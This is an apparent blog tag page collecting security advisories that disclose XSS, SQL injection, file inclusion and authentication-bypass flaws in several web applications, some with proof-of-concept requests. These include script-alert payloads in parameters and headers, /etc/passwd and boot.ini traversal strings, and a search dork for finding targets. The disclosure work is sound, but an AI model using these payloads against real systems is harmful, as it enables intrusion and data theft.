Posts Tagged ‘ ранливости ’
BGS CMS suffers from multiple stored and reflected XSS vulnerabilities when parsing user input to several parameters via GET and POST method (post-auth). Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.
Dork: footer: “powered by BGS CMS”
Advisory ID: ZSL-2012-5084
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5084.php
Zend Server and its components suffers from a cross-site scripting vulnerability. The persistent (stored) XSS issues are triggered when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.
Original Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5078.php
TXT: http://www.zeroscience.mk/codes/zend_s03.txt
HTML: http://www.zeroscience.mk/codes/zend_s03.html
Vendor: http://www.zend.com/topics/ZS-560-SP1-ReleaseNotes-20120308.txt
ADManager Plus suffers from multiple XSS vulnerabilities when parsing user input to the ‘domainName’ parameter in the ‘/jsp/AddDC.jsp’ script via GET method and ‘operation’ parameter in the ‘/DomainConfig.do’ script via POST method. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session.
PoC(s):
#1
– GET http://localhost:8080/jsp/AddDC.jsp?domainName=”><script>alert(‘zsl’)</script> HTTP/1.1
#2
– POST http://localhost:8080/DomainConfig.do?methodToCall=save HTTP/1.1
– DOMAIN_NAME=test&DOMAIN_CONTROLLER_NAME=testsrv&save=Add&operation=”><script>alert(‘zsl’)</script>&reset=
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5070.php
Infoproject Biznis Heroj (XSS/SQLi) Multiple Remote Vulnerabilities
Input passed via the parameters ‘filter’ in ‘widget.dokumenti_lista.php’ and ‘fin_nalog_id’ in ‘nalozi_naslov.php’ script are not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The param ‘config’ in ‘nalozi_naslov.php’ and ‘widget.dokumenti_lista.php’ is vulnerable to a XSS issue where the attacker can execute arbitrary HTML and script code in a user’s browser session in context of an affected site.
Infoproject Biznis Heroj (login.php) Authentication Bypass Vulnerability
The vulnerability is caused due to an error in the logon authentication script (login.php) and can be exploited to bypass the login procedure by defining the ‘username’ and ‘password’ POST parameters with an SQL Injection attack, gaining admin privileges.
Input passed via the parameters ‘redirect.php’ in ‘message.php’ and ‘w’ and ‘d’ in ‘index.php’ script are not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code or execute arbitrary HTML and script code in a user’s browser session in context of an affected site. Path disclosure resides in the ‘sq’ parameter in ‘/plugins/search/search.php’ script.
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5051.php
iGallery, iManager and iBrowser plugins for WYSIWYG editors like tinyMCE, SPAW, htmlAREA, Xinha and FCKeditor suffers from multiple vulnerabilities including: Reflected (Non-Persistent) Cross-Site Scripting, Local File Inclusion, File Disclosure, Arbitrary Deletion.
The iManager plugin has 3 different parameters which can trigger the mentioned above vulnerabilities. ‘d’, ‘lang’ and ‘dir’. iBrowser and iGallery use the same scripts and parameters for corresponding issues. ‘dir’ and ‘lang’. Advisories bellow:
ZSL-2011-5046 – iGallery Plugin v1.0.0 (dir) Remote Cross-Site Scripting Vulnerability
ZSL-2011-5045 – iManager Plugin v1.2.8 (dir) Remote Cross-Site Scripting Vulnerability
ZSL-2011-5044 – iBrowser Plugin v1.4.1 (dir) Remote Cross-Site Scripting Vulnerability
ZSL-2011-5043 – iManager Plugin v1.2.8 (d) Remote Arbitrary File Deletion Vulnerability
ZSL-2011-5042 – iManager Plugin v1.2.8 (lang) Local File Inclusion Vulnerability
ZSL-2011-5041 – iBrowser Plugin v1.4.1 (lang) Local File Inclusion Vulnerability
The application suffers from multiple stored XSS vulnerabilities. Input thru several parameters is not sanitized allowing the attacker to execute HTML code into user’s browser session on the affected site. Also, couple of HTTP header elements are vulnerable to XSS. Vendor issued a patch to address these issues.
Stored XSS (post-auth):
Param: reqName (POST)
Scripts: WorkOrder.do, Problems.cc, AddNewProblem.cc, ChangeDetails.cc (http://localhost:8080/common/UpdateField.jsp)
Params: reqName, description, level, priority, category, title, attach (POST)
Script: WorkOrder.do
Params: keywords, comments (POST)
Script: AddSolution.do
Params: supportDetails, contractName, comments (POST)
Script: ContractDef.do
Param: organizationName (POST)
Script: VendorDef.do
Param: COMMENTS (POST)
Script: MarkUnavailability.jsp (MySchedule.do)
Attack string: “><script>alert(1)</script>
–
HTTP Header XSS:
Elements: referer, accept-language
Scripts: HomePage.do, MySchedule.do, WorkOrder.do
————
GET /HomePage.do HTTP/1.0
Accept: */*
User-Agent: joxy-poxy
Host: localhost:8080
Cookie: JSESSIONID=AD4D28ADDB611A3DE6EAC2C6B4C8808E;JSESSIONIDSSO=B1F6034451E9457EEEF3DA09BA424247
Connection: Close
accept-language: 1<script>alert(1)</script>
Pragma: no-cache
————
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5039.php
ATutor products: ATutor, AContent and AChecker suffer from multiple vulnerabilities including: cross-site scripting (stored, non-persistent), http response splitting, sql injection, path disclosure.
Advisories:
ZSL-2011-5037 – ATutor 2.0.2 (lang) HTTP Response Splitting Vulnerability
ZSL-2011-5036 – ATutor 2.0.2 Multiple Remote Vulnerabilities (SQLi/XSS/PD)
ZSL-2011-5035 – AChecker 1.2 Multiple Remote XSS/PD vulnerabilities
ZSL-2011-5034 – AChecker 1.2 Multiple Error-Based SQL Injection Vulnerabilities
ZSL-2011-5033 – AContent 1.1 (category_name) Remote Script Insertion Vulnerability
ZSL-2011-5032 – AContent 1.1 Multiple Cross-Site Scripting Vulnerabilities
ZSL-2011-5031 – AContent 1.1 Multiple SQL Injection Vulnerabilities
Issues have been reported to the vendor, but not assigned yet, so…that’s that. Cheers ;)
NetServe Web Server is vulnerable to multiple vulnerabilities including cross-site scripting, remote file inclusion, local file inclusion, script insertion, html injection, denial of service, etc. Given that the software is not maintained anymore and the last update was in 2006, there are still a few that uses it. All the parameters are susceptible to the above attacks. The list of the parameters used by the web application are(post/get):
- Action
- EnablePasswords
- _Checks
- _ValidationError
- ListIndex
- SiteList_0
- SSIErrorMessage
- SSIExtensions
- SSITimeFormat
- SSIabbrevSize
- EnableSSI
- LogCGIErrors
- LoggingInterval
- ExtendedLogging
- CGITimeOut
The tests were made using PowerFuzzer and OWASP ZAP. Attackers can exploit any of the issues using a web browser.
————snip—————
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=http%3A%2F%2Fwww.google.com%2F&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=%2Fetc%2Fpasswd&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=%2Fetc%2Fpasswd&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=%2Fetc%2Fpasswd&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=%2Fetc%2Fpasswd
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=%2Fetc%2Fpasswd%00&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=%2Fetc%2Fpasswd%00&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=%2Fetc%2Fpasswd%00&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=%2Fetc%2Fpasswd%00
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=c%3A%5C%5Cboot.ini&_ValidationError=addsitelist.html&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
Remote include in http://127.0.0.1/admin/index.html
with params =Action=ListUpdate&_ValidationError=c%3A%5C%5Cboot.ini&ListIndex=0&SiteList_0=DEFAULT
coming fromhttp://127.0.0.1/admin/addindex.html
————snip—————
Advisory ID: ZSL-2011-5021
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5021.php
phpBugTracker suffers from multiple cross-site scripting vulns. The issue is triggered when input passed via the ‘form’ parameter to the ‘query.php’ script is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site. ‘query.php’ and ‘newaccount.php’ are also vulnerable because they fail to perform filtering when using the REQUEST_URI variable.
PoC:
http://127.0.0.1/query.php?op=doquery&form=1>’><script>alert(1)</script>
http://127.0.0.1/query.php/>’><script>alert(1)</script>
http://127.0.0.1/newaccount.php/>”><script>alert(1)</script>
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4996.php
IT.com.mk Exploit Database